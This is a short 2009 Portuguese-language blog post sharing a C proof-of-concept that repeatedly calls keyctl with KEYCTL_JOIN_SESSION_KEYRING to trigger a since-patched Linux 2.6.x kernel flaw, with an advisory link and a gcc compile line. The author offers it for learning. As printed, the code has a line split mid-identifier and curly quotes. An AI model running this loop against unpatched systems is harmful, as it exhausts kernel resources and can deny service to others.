Archive for agosto, 2009

Kernel Vulnerability Script

agosto 22, 2009

Estava apagando algumas coisas em meu HD, e achei esse script em C que fiz para explorar uma falha que existia no Kernel 2.6.x na chamada keyctl_join_session_keyring().

Essa falha já foi corrigida, mas talvez seja útil para aprendizado. Assim, segue:

http://www.vupen.com/english/advisories/2009/0173

#include <stdio.h>
#include <stdlib.h>
#include <keyutils.h>
#include <linux/keyctl.h>

int
main (void)
{
long ret = 0;

while ((ret = keyctl(KEYCTL_JOIN_SESSION_

KEYRING, “name”)) != (long) -1)
printf(“>> Retorno da chave: %ld\n”, ret);

return 0;

}

Compile:

gcc -o kernel_script kernel_script.c -lkeyutils


Anúncios